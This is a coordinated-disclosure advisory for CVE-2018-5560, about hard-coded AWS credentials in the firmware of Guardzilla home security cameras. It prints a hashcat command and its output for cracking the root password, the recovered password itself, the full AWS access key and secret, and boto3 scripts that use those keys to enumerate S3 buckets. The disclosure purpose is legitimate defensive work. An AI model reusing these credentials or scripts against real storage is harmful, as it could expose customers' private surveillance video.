Researcher Contact Information
| Name | Contact | Role |
| Nick McClendon | nicklaus@kulinacs.com | Dumped the firmware and extracted the binaries |
| Andrew Mirghassemi | a.mirghassemi@live.com | Dumped the firmware and extracted the binaries |
| Charles Dardaman | @CharlesDardaman | Found and Extracted the AWS Credentials from the Binaries |
| INIT_6 | @INIT_3 | Co-Founder of 0DayAllDay, Cracked the root password |
| Chris | chris@spectant.io | Co-Founder of 0DayAllDay, AWS Policy Verification |
Executive Summary
During the 0DAYALLDAY Research Event a vulnerability was discovered (CVE-2018-5560) in the Guardzilla Security Video System Model #: GZ521W. The vulnerability lies within the design and implementation of Amazon Simple Storage Service (S3) credentials inside the Guardzilla Security Camera firmware. Accessing these S3 storage credentials is trivial for a moderately skilled attacker.
Upon inspection of the access rights given to the S3 credentials within the analyzed firmware it was discovered that the embedded S3 credentials have unlimited access to all S3 buckets provisioned for that account.
While no user data was accessed during our testing, the embedded S3 credentials could easily be used to view and download any stored file/video in the associated buckets.
This issue is an instance of CWE-798: Use of Hard-coded Credentials. It has a CVSSv3 base score of 8.6, since once the password is known, any unauthenticated user can collect the data from any affected system over the internet.
Product Description
The Guardzilla All-In-One Video Security System is a home security platform that provides indoor video surveillance. More information about the product can be found at the vendor’s website. Only the GZ501W model was tested. It is not known if other models are affected.
Findings Overview
This section summarizes the strategic problems identified, risk ratings, and recommendations. The Detailed Testing section describes the attempted attacks, evidence (including screen shots), risk-ratings, and potential solutions.
The results from this testing as well as any additional details regarding any further exposure can be found in the Detailed Testing section.
| Device | Guardzilla GZ521W Security Video System |
|---|
| Finding | Risk Rating | Remediation Status |
|---|---|---|
| Embedded S3 Credentials Unlimited Access Policy | CRITICAL | Vulnerable |
| OpenSSL 1.0.1g Multiple Vulnerabilities | HIGH | Vulnerable |
Strategic Recommendations
Strategic recommendations are those actions that can be taken by an organization to address the findings outlined in the findings overview section of this executive summary in a more generic and global way, rather than fixing individual problems instance by instance.
Implementing one or more of these recommendations may greatly improve the security posture of an organization and/or reduce the attack surface or exposure of an application or environment as well as address multiple findings.
Recommendation for Guardzilla:
- Review the source code of the various resources and services to verify that no data is being passed to potential malicious 3rd party providers.
- Limit the access policy of the associated embedded S3 credentials to minimize access to cross customer information.
- Audit any and all 3rd party libraries for vulnerabilities and update those libraries where necessary.
Benefits:
- Remediate all the findings from CVE-2018-5560
- Prevent the application from succumbing to future vulnerabilities.
Detailed Technical Description
During the event a Winbond SPIFlash chip Model #: 25Q128FVSG was identified. The data sheet for the chip can be found here.
Once the firmware was extracted from that chip it was identified to contain a SquashFS file system and a Journaling Flash File System version 2 (JFFS2) file system. It was also noted that the “Distribution Base” is Grain Media ARM Linux 3.3.
Once these file systems were extracted with binwalk, the following string was found in the Message of The Day (MOTD):
Copyright (C) 2005 Faraday Corp. www.faraday.com.twIt was also noted that the /etc/shadow file contained the following DES encrypted password for the root administrator account:
root:MvynOwD449PkM:0:0:99999:7:::Because DES has been deprecated since 2005 it was trivially cracked with dual Nvidia GeForce GTX 1080 Ti graphics cards:
hashcat -m 1500 -a 3 -o ../guardzilla.found -O -i --increment-min=8 --increment-max=12 -w 3 -t 50 ../guardzilla.hash ?a?a?a?a?a?a?a?a?a?a?a?a?a
Session..........: hashcat
Status...........: Cracked
Hash.Type........: descrypt, DES (Unix), Traditional DES
Hash.Target......: MvynOwD449PkM
Time.Started.....: Tue Oct 2 07:36:30 2018 (3 hours, 35 mins)
Time.Estimated...: Tue Oct 2 11:12:06 2018 (0 secs)
Guess.Mask.......: ?a?a?a?a?a?a?a?a [8]
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....: 1176.6 MH/s (49.11ms) @ Accel:8 Loops:1024 Thr:256 Vec:1
Speed.Dev.#2.....: 776.5 MH/s (106.80ms) @ Accel:16 Loops:1024 Thr:256 Vec:1
Speed.Dev.#*.....: 1953.0 MH/s
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 25226596581376/39062500000000 (64.58%)
Rejected.........: 0/25226596581376 (0.00%)
Restore.Point....: 201580544/312500000 (64.51%)
Candidates.#1....: sarKrvcz -> 9poL82dw
Candidates.#2....: AiLwoz3x -> jE3iABuo
HWMon.Dev.#1.....: Temp: 66c Fan: 99% Util: 99% Core:1797MHz Mem:5005MHz Bus:8
HWMon.Dev.#2.....: Temp: 82c Fan: 99% Util:100% Core:1632MHz Mem:4513MHz Bus:8The recovered password: ‘GMANCIPC’
It was noted that during boot init script launches boot.sh which in turn launches both /mnt/mtd/startapp and /home/daemon.exe. The startapp resource launches vg_boot.sh (which configures low level video settings) and main.exe. The following table represents the binary information for both main.exe and daemon.exe:
| Binary | Architecture | Type | EABI | Link Type | Interpreter | Symbols |
|---|---|---|---|---|---|---|
| main.exe | ELF 32-bit | ARM | 5 version 1 | Dynamically linked | /lib/ld-uClibc.so.0 | Stripped |
| Daemon.exe | ELF 32-bit | ARM | 5 version 1 | Dynamically linked | /lib/ld-uClibc.so.0 | Not Stripped |
Embedded S3 Credentials Unlimited Access Policy
Once the binaries were extracted from the firmware they were analyzed in IDA Pro to determine if any vulnerabilities could be identified. Once the main.exe had been disassembled and analyzed it was noted that a set of strings resembled AWS credentials:
Following the references, we can see that they are exports from the binary that are labeled: accessKey, secretAccessKey, hostname, and bucket. This format lines up with how AWS bucket keys are designed:
| AccessKeyIdG | AKIAJQDP34RKL7GGV7OQ |
| secretAccessKeyG | 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 |
| hostName | s3.amazonaws.com |
| bucket | motion-detection |
The following script was developed to test the S3 credentials to determine if they were valid as well as determine what access writes the credentials had:
import boto3
# Create an S3 client
s3 = boto3.client('s3',aws_access_key_id='AKIAJQDP34RKL7GGV7OQ',aws_secret_access_key='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',region_name='us-west-1')
try:
result = s3.get_bucket_policy(Bucket='motion-detection')
print(result)
except Exception as e:
print(e)When the run script would error out stating that no specific policy exists on the embedded credentials for the motion-detection bucket:
An error occurred (NoSuchBucketPolicy) when calling the GetBucketPolicy operation: The bucket policy does not existThe previously mentioned script was modified to list any available S3 buckets accessible by the embedded credentials:
import boto3
# Create an S3 client
s3 = boto3.client('s3',aws_access_key_id='AKIAJQDP34RKL7GGV7OQ',aws_secret_access_key='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',region_name='us-west-1')
try:
result = s3.list_buckets()
print(result)
except Exception as e:
print(e)Once run that script lists all buckets accessible by the embedded credentials
{
'Buckets': [{
'CreationDate': datetime.datetime(2017, 2, 16, 21, 52, 52, tzinfo = tzutc()),
'Name': 'elasticbeanstalk-us-west-2-036770821135'
}, {
'CreationDate': datetime.datetime(2018, 4, 5, 15, 45, 22, tzinfo = tzutc()),
'Name': 'facial-detection'
}, {
'CreationDate': datetime.datetime(2017, 11, 8, 19, 38, 15, tzinfo = tzutc()),
'Name': 'free-video-storage'
}, {
'CreationDate': datetime.datetime(2018, 3, 9, 20, 7, 19, tzinfo = tzutc()),
'Name': 'free-video-storage-persist'
}, {
'CreationDate': datetime.datetime(2016, 8, 15, 19, 53, 12, tzinfo = tzutc()),
'Name': 'gz-rds-backups'
}, {
'CreationDate': datetime.datetime(2017, 11, 8, 19, 37, 44, tzinfo = tzutc()),
'Name': 'gz-test-bucket'
}, {
'CreationDate': datetime.datetime(2017, 11, 8, 19, 38, 29, tzinfo = tzutc()),
'Name': 'motion-detection'
}, {
'CreationDate': datetime.datetime(2017, 11, 8, 19, 38, 47, tzinfo = tzutc()),
'Name': 'premium-video-storage'
}, {
'CreationDate': datetime.datetime(2018, 3, 9, 20, 6, 47, tzinfo = tzutc()),
'Name': 'premium-video-storage-persist'
}, {
'CreationDate': datetime.datetime(2018, 1, 25, 20, 41, 16, tzinfo = tzutc()),
'Name': 'rekognition-video-console-demo-cmh-guardzilla-2918n05v5rvh'
}, {
'CreationDate': datetime.datetime(2017, 5, 17, 16, 1, 9, tzinfo = tzutc()),
'Name': 'setup-videos'
}, {
'CreationDate': datetime.datetime(2018, 1, 24, 23, 0, 39, tzinfo = tzutc()),
'Name': 'wowza-test-bucket'
}],
'Owner': {
'ID': 'a3db77fe2a21093a2f0d471b0a9677f8aff7c3c7b7a4944b752ccc0c3a4a4af7',
'DisplayName': 'geoff'
}
}Using the PACU AWS framework it was determined that the embedded credentials don’t have permission to gather further details on policies:
{
"AccessKeyId": "AKIAJQDP34RKL7GGV7OQ",
"Arn": "arn:aws:iam::036770821135:user/motion-detection",
"Roles": null,
"KeyAlias": "Guardzilla",
"AccountId": "036770821135",
"UserId": "AIDAJQRSLLW52U7GLHFYE",
"Groups": [],
"Policies": [],
"Permissions": {
"Deny": {},
"Allow": {}
},
"SecretAccessKey": "igH8yFmmpMbnkcUaCqXJIRIozKVaXaRhE7PWHAYa",
"UserName": "",
"RoleName": null,
"SessionToken": null,
"PermissionsConfirmed": false
} No further testing against the credentials was done to prevent the unintentional access of Guardzilla customer data.
OpenSSL 1.0.1g Multiple Vulnerabilities
It was also noted that an out of date OpenSSL library was being referenced inside the firmware. The following table represents the publicly identified vulnerabilities affecting the OpenSSL Library version 1.0.1g.
| CVE Number | Date Published | Risk Rating |
|---|---|---|
| CVE-2016-0705 | 2016-03-03 | CRITICAL |
| Description | ||
| Double free vulnerability in the dsa_priv_decode function in crypto/dsa/dsa_ameth.c in OpenSSL 1.0.1 before 1.0.1s and 1.0.2 before 1.0.2g allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a malformed DSA private key. | ||
| CVE Number | Date Published | Risk Rating |
| CVE-2015-0292 | 2015-03-19 | HIGH |
| Description | ||
| Integer underflow in the EVP_DecodeUpdate function in crypto/evp/encode.c in the base64-decoding implementation in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted base64 data that triggers a buffer overflow. | ||
| CVE Number | Date Published | Risk Rating |
| CVE-2014-8176 | 2015-06-12 | HIGH |
| Description | ||
| The dtls1_clear_queues function in ssl/d1_lib.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h frees data structures without considering that application data can arrive between a ChangeCipherSpec message and a Finished message, which allows remote DTLS peers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact via unexpected application data. | ||
| CVE Number | Date Published | Risk Rating |
| CVE-2016-0797 | 2016-03-03 | MEDIUM |
| Description | ||
| Multiple integer overflows in OpenSSL 1.0.1 before 1.0.1s and 1.0.2 before 1.0.2g allow remote attackers to cause a denial of service (heap memory corruption or NULL pointer dereference) or possibly have unspecified other impact via a long digit string that is mishandled by the (1) BN_dec2bn or (2) BN_hex2bn function, related to crypto/bn/bn.h and crypto/bn/bn_print.c. | ||
| CVE Number | Date Published | Risk Rating |
| CVE-2015-0287 | 2015-03-19 | MEDIUM |
| Description | ||
| The ASN1_item_ex_d2i function in crypto/asn1/tasn_dec.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a does not reinitialize CHOICE and ADB data structures, which might allow attackers to cause a denial of service (invalid write operation and memory corruption) by leveraging an application that relies on ASN.1 structure reuse. | ||
| CVE Number | Date Published | Risk Rating |
| CVE-2015-0209 | 2015-03-19 | MEDIUM |
| Description | ||
| Use-after-free vulnerability in the d2i_ECPrivateKey function in crypto/ec/ec_asn1.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a might allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact via a malformed Elliptic Curve (EC) private-key file that is improperly handled during import. | ||
Informational Findings
During the review it was noted that the Guardzilla camera listens on port 23 with an “ipc login” prompt by default. It was also noted a large amount of UDP traffic was being sent to a US-EAST-2 Amazon server. We also noted several HTTP requests going out to:
54.68.243.114 (ec2-54-68-243-114.us-west-2.compute.amazonaws.com)
http://54.68.243.114/apns/apns.php?cmd=reg_server&uid=G1KEXWU2BPWHCFZ5111A
http://54.68.243.114/apns/apns.php?cmd=raise_event&uid=G1KEXWU2BPWHCFZ5111A&event_type=1&event_time=1538239032
52.218.200.66 (s3-us-west-2-w.amazonaws.com)
During the binary review several external IP’s were identified as well as several external data sources. The following table represents all identified external IP’s and data sources identified within the main.exe binary:
| Host | Data Source Information |
|---|---|
| 61.220.62.219 | HiNet, Taiwan |
| 203.69.81.91 | HiNet, Taiwan |
| 210.61.248.232 | HiNet, Taiwan |
| 42.99.254.162 | Pacnet Services, Japan |
| 50.19.254.134 | Amazon US-EAST-1, Virginia |
| 122.248.234.207 | Amazon AP-SOUTHEAST-1, Singapore |
| 46.137.188.54 | Amazon EU-WEST-1, Ireland |
| 122.226.84.253 | China Telecom, Jinhua, China |
| 61.188.37.216 | China Telecom, Chengdu, China |
| 120.24.59.150 | Alibaba, Hangzhou, China |
| 114.215.137.159 | Aliyun Computing, Hangzhou, China |
| 104.199.156.58 | Google Cloud |
| 175.41.238.100 | Amazon AP-NORTHEAST-1, Japan |
| s3.amazonaws.com | Amazon |
| time.windows.com | Microsoft |
| m1.iotcplatform.com | ThroughTek Co, China |
| m2.iotcplatform.com | ThroughTek Co, China |
| m3.iotcplatform.com | ThroughTek Co, China |
| m4.iotcplatform.com | ThroughTek Co, China |
| m5.iotcplatform.com | ThroughTek Co, China |
| dropbox_sendFile_record_del | Dropbox |
| dropbox_sendFile_record_add | Dropbox |
| g_dropboxFileMutex | Dropbox |
| dropbox_sendFile_record_get | Dropbox |
| /mnt/nfs | Local NFS |
The highlighted hosts should be further investigated to be sure no unintended video surveillance data is being sent to those hosts/providers. The iotcplatform.com host is especially troubling as it has been identified in previous Krebs on Security research:
It was also noted that a suspected UART port was identified on the circuit board. However, Guardzilla removed two pull-up resistors for production units. Replacement resistors were attempted and worked temporarily. We are confident with the correct surface mount resistors connected to the 3.3-volt line and RX and TX lines the UART port would be usable.
Disclosure Timeline
● Sat, Sep 29, 2018: Issue discovered at 0DayAllDay Research Event
● Wed, Oct 3, 2018: Issue disclosed to Rapid7 for coordinated disclosure
● Wed, Oct 24, 2018: Issue disclosed to vendor
● Thu, Nov 8, 2018: Issue disclosed to CERT/CC as VRF#18-11-NPPXC
● Fri, Dec 14, 2018: CVE-2018-5560 reserved
● Thu, Dec 27, 2018: Public disclosure
As of this writing the vendor hasn't responded to any communication from Rapid7 or CERT.
2024,